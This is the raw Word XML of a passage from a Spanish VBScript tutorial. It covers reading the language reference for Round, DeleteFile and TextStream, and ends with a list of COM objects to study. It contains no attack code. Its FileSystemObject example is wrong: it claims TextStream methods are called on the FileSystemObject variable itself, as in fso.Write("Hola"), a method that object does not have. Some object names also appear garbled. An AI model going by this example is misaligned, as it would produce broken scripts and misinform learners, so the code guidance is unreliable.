          <w:numId w:val="19"/>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Variable = 4: Round(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5,Variable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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1 = 5: Var2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>4 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Round(Var1,Var2)</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bien poniendo en los argumentos sumas y demás (ej. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Round(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">5+3/2) ). Esto es así porque los argumentos son dos números (o dos variables numéricas), y el segundo puede o no puede estar ya que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es omisible</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cuya caso</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la función como dice la descripción devuelve números enteros). Luego, como la mayoría de veces, un ejemplo, la versión y funciones relacionada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Más o menos, en cuanto a funciones esta la cosa bastante clara, aún así veamos otro ejemplo más antes de pasar a otro tipo de información que dan las referencias:</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5398770" cy="4630420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11933" name="Picture 11933"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11933" name="Picture 11933"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5398770" cy="4630420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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mos directamente a lo que nos importa: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>objeto.DeleteFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(especificación [,forzar]), </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">pues es lo que cabe destacar de aquí. Podemos ver que es la función DeleteFile, que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">tiene dos argumentos y que uno de ellos es omisible, y que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>depende de un objeto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. A continuación, en Argumentos especifica en primer lugar el objeto en cuestión del que se trata; luego especifica los valores de los dos argumentos (cadena y booleano, o en su defecto dos variables) y que como hemos deducido, el segundo es omisible (en cuyo caso será false). Vemos pues una pequeña diferencia en cuanto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a objetos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se trata. Además, el ejemplo vemos que no solo está en VBScript, sino en JScript también ya que se trata de un objeto que puede ser usado en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ambos lenguajes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tan solo debemos pues fijarnos en lo que nos interesa. Pero esto de los objetos no acaba aquí, si vamos a la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> nos encontramos con esto:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1364"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3761740" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11965" name="Picture 11965"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11965" name="Picture 11965"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3761740" cy="177165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tendemos básicamente que quiere decir todo, pero no recuerdo haberos enseñado ningún objeto llamado </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TextStream</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para manipular archivos. Lo normal en ver la referencia, visto el ejemplo anterior sería en pensar en escribir:</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Set Txt = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“Scripting.TextStream”)</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Txt.Write(“Hola”)</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Pero como muy bien sabemos esta función no se usa así, ni por supuesto conseguiréis nada creando ese objeto pues no existe como tal. Para ver que es lo que pasa aquí tenemos que buscar en la referencia el objeto TextStream, encontrándonos con algo así:</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5393690" cy="3643630"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11990" name="Picture 11990"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11990" name="Picture 11990"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5393690" cy="364363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si lo entendemos creo que queda claro ya lo que pasa (y si no el ejemplo muestra como hacerlo): </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TextStream.(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o una propiedad o un metodo)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es lo que encontramos en el recuadro, y la descripción dice: TextStream se reemplaza por una variable marcador que representa al objeto devuelto desde un objeto FileSystemObject. En otras palabras, que TextStream es el nombre generico de la estructura que mencioné al explicar esta función que nos permite escribir y leer en un archivo. Si seguimos las instrucciones hariamos algo así:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="93" w:right="855"/>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Set fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“Scripting.FileSystemObject”) fso.Write(“Hola”) ‘Reemplazamos TextStream por la variable que tiene el fso, y usamos el método Writ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Queda ya más claro ¿No? Lo que podemos poner después de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una propiedad o un método, de entre todos los que tenemos listados justo abajo (si hacemos clic nos dirá como usar cada uno de ellos). Bueno, esto es lo más extravagante que podáis encontrar; si hay alguna otra dificultad, con mirar a los ejemplos y un par de pruebas, estoy seguro que a estas alturas lo sabréis sacar ya sin problemas.</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Pongamos un último ejemplo, esta vez de una sentencia, para ver un poco los cambios y afirmar ya lo visto, si que queden dudas:</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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5398770" cy="4942840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12033" name="Picture 12033"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="12033" name="Picture 12033"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5398770" cy="4942840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="898"/>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te fijas, no hay mucho que explicar de este último ejemplo, tan solo destacar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en vez de argumentos, aquí pueden ser </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>omitidos partes de la sentencia</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">; y que en este caso, en los Comentarios, se </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>explica detalladamente</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el funcionamiento de la misma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="44"/>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Notas Final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Bueno, para acabar este tutorial de Visual Basic Script, recordar en primer lugar los puntos básicos para conseguir un dominio avanzado de Visual Basic Script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conocer diversas funciones y usos alternativos posibles con ejemplos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conocer la forma de trabajar con referencias del lenguaje.</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Repasar con las referencias todo lo visto hasta ahora.</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Aprender con las referencias nuevas estructuras y funciones análogas.</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prender mediante las referencias otros objetos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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Practicar, practicar y practicar much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os puntos primero y segundo básicamente están ya hechos aquí, aunque podréis encontrar por Internet si buscáis con ahínco muchas otras formas de usar Visual Basic Script; ya que como dice el dicho: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Si se puede imaginar, se puede programar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. El tercero y cuarto es cuestión de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con paciencia, repaséis ya de forma “legal” todas las funciones vistas hasta la fecha, y aprendáis cosas nuevas, como las sentencias </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cas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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, o las funciones de los objetos para redes, etc. Sobre el quinto punto, sería importante </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>buscar información</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre básicamente los siguientes objetos:</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Excel.Application</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Word.Application</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ccess.Application</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Outlook.Application</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DOB.Stream</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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MSWinsock.Winsock </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(Funcionamiento completo para VB6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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DODB.connection </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(Posiblemente solo en VBScript para ASP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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t>Microsoft.XmlHttp</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Con esto podréis desde realizar todo lo que las aplicaciones ofimáticas son capaces de hacer, hasta manejar casi todos los protocolos de Internet y las Bases de Datos (incluida la SQL). Por supuesto que hay más muy interesantes y algunos que ofrecen empresas, pero estos son los genéricos más usado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s otro lado, el Visual Basic Script </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no se limita solo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a los archivos “*.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>vbs</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">”; sino que puede ser usado integro en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>páginas html, y en páginas ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">.  Me explico: si tu en una página web, escribes las etiquetas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;Script language</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>=”VBScript</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”&gt;&lt;/Script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Puedes colocar entre ellas código VBScript que cumpla con las siguientes peculiaridades:</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No debe llamar a ningún objeto o ActiveX.</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No debe usar ningún objeto o ActiveX.</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Se tratarán de funciones simples vistas en el primer tutorial.</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Existen nuevas funciones específicas para esta versión de VBScript.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
